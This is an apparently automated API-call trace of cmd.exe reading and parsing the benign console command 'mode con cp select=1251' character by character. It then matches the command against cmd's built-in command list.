	[0136.979] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a44c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0136.979] _vsnwprintf (in: _Buffer=0x4a43eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x15f348 | out: _Buffer="C:\\Windows\\system32") returned 19
	[0136.980] _vsnwprintf (in: _Buffer=0x4a43eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x15f348 | out: _Buffer=">") returned 1
	[0136.980] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0136.980] GetFileType (hFile=0xf8) returned 0x3
	[0136.980] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0136.980] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4a44c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21
	[0136.980] WriteFile (in: hFile=0xf8, lpBuffer=0x4a44c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x15f338, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesWritten=0x15f338*=0x14, lpOverlapped=0x0) returned 1
	[0136.980] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.980] GetFileType (hFile=0xec) returned 0x3
	[0136.980] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.980] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.980] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.980] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e320, cchWideChar=1 | out: lpWideCharStr="m") returned 1
	[0136.980] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.980] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.980] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.980] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e322, cchWideChar=1 | out: lpWideCharStr="o") returned 1
	[0136.980] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.980] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.980] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.980] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e324, cchWideChar=1 | out: lpWideCharStr="d") returned 1
	[0136.980] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.980] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.980] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e326, cchWideChar=1 | out: lpWideCharStr="e") returned 1
	[0136.981] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.981] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.981] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e328, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
	[0136.981] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.981] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.981] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e32a, cchWideChar=1 | out: lpWideCharStr="c") returned 1
	[0136.981] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.981] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.981] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e32c, cchWideChar=1 | out: lpWideCharStr="o") returned 1
	[0136.981] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.981] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.981] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e32e, cchWideChar=1 | out: lpWideCharStr="n") returned 1
	[0136.981] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.981] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.981] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e330, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
	[0136.981] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.981] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.981] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e332, cchWideChar=1 | out: lpWideCharStr="c") returned 1
	[0136.981] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.981] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.982] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.982] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e334, cchWideChar=1 | out: lpWideCharStr="p") returned 1
	[0136.982] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.982] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.982] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.982] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e336, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
	[0136.982] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.982] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.982] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.982] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e338, cchWideChar=1 | out: lpWideCharStr="s") returned 1
	[0136.982] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.982] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.982] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.982] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e33a, cchWideChar=1 | out: lpWideCharStr="e") returned 1
	[0136.982] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.982] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.982] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.982] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e33c, cchWideChar=1 | out: lpWideCharStr="l") returned 1
	[0136.982] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.982] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.982] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.982] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e33e, cchWideChar=1 | out: lpWideCharStr="e") returned 1
	[0136.982] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.982] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.982] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.982] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e340, cchWideChar=1 | out: lpWideCharStr="c") returned 1
	[0136.982] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.982] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.983] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.983] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e342, cchWideChar=1 | out: lpWideCharStr="t") returned 1
	[0136.983] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.983] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.983] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.983] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e344, cchWideChar=1 | out: lpWideCharStr="=") returned 1
	[0136.983] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.983] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.983] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.983] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e346, cchWideChar=1 | out: lpWideCharStr="1") returned 1
	[0136.983] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.983] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.983] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.983] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e348, cchWideChar=1 | out: lpWideCharStr="2") returned 1
	[0136.983] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.983] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.983] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.983] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e34a, cchWideChar=1 | out: lpWideCharStr="5") returned 1
	[0136.983] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.983] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.983] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.983] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e34c, cchWideChar=1 | out: lpWideCharStr="1") returned 1
	[0136.983] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.983] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.983] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0136.983] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e34e, cchWideChar=1 | out: lpWideCharStr="\n") returned 1
	[0136.984] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.984] GetFileType (hFile=0xec) returned 0x3
	[0136.984] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.984] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0136.984] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0136.984] GetFileType (hFile=0xf8) returned 0x3
	[0136.984] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0136.984] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mode con cp select=1251\n", cchWideChar=-1, lpMultiByteStr=0x4a44c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mode con cp select=1251\n", lpUsedDefaultChar=0x0) returned 25
	[0136.984] WriteFile (in: hFile=0xf8, lpBuffer=0x4a44c320*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x15f618, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesWritten=0x15f618*=0x18, lpOverlapped=0x0) returned 1
	[0136.984] GetProcessHeap () returned 0x1f0000
	[0136.984] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x4012) returned 0x20b310
	[0136.984] GetProcessHeap () returned 0x1f0000
	[0136.984] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20b310 | out: hHeap=0x1f0000) returned 1
	[0136.985] _wcsicmp (_String1="mode", _String2=")") returned 68
	[0136.985] _wcsicmp (_String1="FOR", _String2="mode") returned -7
	[0136.985] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7
	[0136.985] _wcsicmp (_String1="IF", _String2="mode") returned -4
	[0136.985] _wcsicmp (_String1="IF/?", _String2="mode") returned -4
	[0136.985] _wcsicmp (_String1="REM", _String2="mode") returned 5
	[0136.985] _wcsicmp (_String1="REM/?", _String2="mode") returned 5
	[0136.985] GetProcessHeap () returned 0x1f0000
	[0136.985] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xb0) returned 0x209840
	[0136.985] GetProcessHeap () returned 0x1f0000
	[0136.985] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x1a) returned 0x204630
	[0136.986] GetProcessHeap () returned 0x1f0000
	[0136.986] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x38) returned 0x206550
	[0136.986] GetConsoleOutputCP () returned 0x1b5
	[0136.987] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a44bfe0 | out: lpCPInfo=0x4a44bfe0) returned 1
	[0136.987] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0136.987] GetConsoleTitleW (in: lpConsoleTitle=0x15f5d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0136.987] _wcsicmp (_String1="mode", _String2="DIR") returned 9
	[0136.987] _wcsicmp (_String1="mode", _String2="ERASE") returned 8
	[0136.987] _wcsicmp (_String1="mode", _String2="DEL") returned 9
	[0136.987] _wcsicmp (_String1="mode", _String2="TYPE") returned -7
	[0136.987] _wcsicmp (_String1="mode", _String2="COPY") returned 10
	[0136.987] _wcsicmp (_String1="mode", _String2="CD") returned 10
	[0136.987] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10
	[0136.987] _wcsicmp (_String1="mode", _String2="RENAME") returned -5
	[0136.987] _wcsicmp (_String1="mode", _String2="REN") returned -5
	[0136.987] _wcsicmp (_String1="mode", _String2="ECHO") returned 8
	[0136.987] _wcsicmp (_String1="mode", _String2="SET") returned -6
	[0136.987] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3
	[0136.987] _wcsicmp (_String1="mode", _String2="DATE") returned 9
	[0136.987] _wcsicmp (_String1="mode", _String2="TIME") returned -7
	[0136.987] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3
	[0136.987] _wcsicmp (_String1="mode", _String2="MD") returned 11
	[0136.987] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4
	[0136.988] _wcsicmp (_String1="mode", _String2="RD") returned -5
	[0136.988] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5
	[0136.988] _wcsicmp (_String1="mode", _String2="PATH") returned -3
	[0136.988] _wcsicmp (_String1="mode", _String2="GOTO") returned 6
	[0136.988] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6
	[0136.988] _wcsicmp (_String1="mode", _String2="CLS") returned 10
	[0136.988] _wcsicmp (_String1="mode", _String2="CALL") returned 10
	[0136.988] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9
	[0136.988] _wcsicmp (_String1="mode", _String2="VER") returned -9
	[0136.988] _wcsicmp (_String1="mode", _String2="VOL") returned -9
	[0136.988] _wcsicmp (_String1="mode", _String2="EXIT") returned 8
	[0136.988] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6
	[0136.988] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8
	[0136.988] _wcsicmp (_String1="mode", _String2="TITLE") returned -7
	[0136.988] _wcsicmp (_String1="mode", _String2="START") returned -6
	[0136.988] _wcsicmp (_String1="mode", _String2="DPATH") returned 9
	[0136.988] _wcsicmp (_String1="mode", _String2="KEYS") returned 2
	[0136.988] _wcsicmp (_String1="mode", _String2="MOVE") returned -18
	[0136.988] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3
	[0136.988] _wcsicmp (_String1="mode", _String2="POPD") returned -3
	[0136.988] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12
	[0136.988] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7
	[0136.988] _wcsicmp (_String1="mode", _String2="BREAK") returned 11
	[0136.988] _wcsicmp (_String1="mode", _String2="COLOR") returned 10
	[0136.988] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4
	[0136.988] _wcsicmp (_String1="mode", _String2="DIR") returned 9
	[0136.988] _wcsicmp (_String1="mode", _String2="ERASE") returned 8
	[0136.988] _wcsicmp (_String1="mode", _String2="DEL") returned 9
	[0136.988] _wcsicmp (_String1="mode", _String2="TYPE") returned -7
	[0136.988] _wcsicmp (_String1="mode", _String2="COPY") returned 10
	[0136.988] _wcsicmp (_String1="mode", _String2="CD") returned 10
	[0136.988] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10
	[0136.988] _wcsicmp (_String1="mode", _String2="RENAME") returned -5
	[0136.988] _wcsicmp (_String1="mode", _String2="REN") returned -5
	[0136.988] _wcsicmp (_String1="mode", _String2="ECHO") returned 8
	[0136.988] _wcsicmp (_String1="mode", _String2="SET") returned -6
	[0136.988] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3
	[0136.988] _wcsicmp (_String1="mode", _String2="DATE") returned 9
	[0136.988] _wcsicmp (_String1="mode", _String2="TIME") returned -7
	[0136.988] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3
	[0136.989] _wcsicmp (_String1="mode", _String2="MD") returned 11
	[0136.989] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4
	[0136.989] _wcsicmp (_String1="mode", _String2="RD") returned -5
	[0136.989] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5
	[0136.989] _wcsicmp (_String1="mode", _String2="PATH") returned -3
	[0136.989] _wcsicmp (_String1="mode", _String2="GOTO") returned 6
	[0136.989] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6
	[0136.989] _wcsicmp (_String1="mode", _String2="CLS") returned 10
	[0136.989] _wcsicmp (_String1="mode", _String2="CALL") returned 10
	[0136.989] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9
	[0136.989] _wcsicmp (_String1="mode", _String2="VER") returned -9
	[0136.989] _wcsicmp (_String1="mode", _String2="VOL") returned -9
	[0136.989] _wcsicmp (_String1="mode", _String2="EXIT") returned 8
	[0136.989] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6
	[0136.989] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8
	[0136.989] _wcsicmp (_String1="mode", _String2="TITLE") returned -7
	[0136.989] _wcsicmp (_String1="mode", _String2="START") returned -6
	[0136.989] _wcsicmp (_String1="mode", _String2="DPATH") returned 9
	[0136.989] _wcsicmp (_String1="mode", _String2="KEYS") returned 2
	[0136.989] _wcsicmp (_String1="mode", _String2="MOVE") returned -18
	[0136.989] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3
	[0136.989] _wcsicmp (_String1="mode", _String2="POPD") returned -3
	[0136.989] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12
	[0136.989] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7
	[0136.989] _wcsicmp (_String1="mode", _String2="BREAK") returned 11
	[0136.989] _wcsicmp (_String1="mode", _String2="COLOR") returned 10
	[0136.989] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4
	[0136.989] _wcsicmp (_String1="mode", _String2="FOR") returned 7
	[0136.989] _wcsicmp (_String1="mode", _String2="IF") returned 4
	[0136.989] _wcsicmp (_String1="mode", _String2="REM") returned -5
	[0136.989] GetProcessHeap () returned 0x1f0000
	[0136.989] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x218) returned 0x20aae0
	[0136.989] GetProcessHeap () returned 0x1f0000
	[0136.990] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x42) returned 0x209900
	[0136.990] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10
	[0136.990] GetProcessHeap () returned 0x1f0000
	[0136.990] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x420) returned 0x20b310
	[0136.990] SetErrorMode (uMode=0x0) returned 0x0
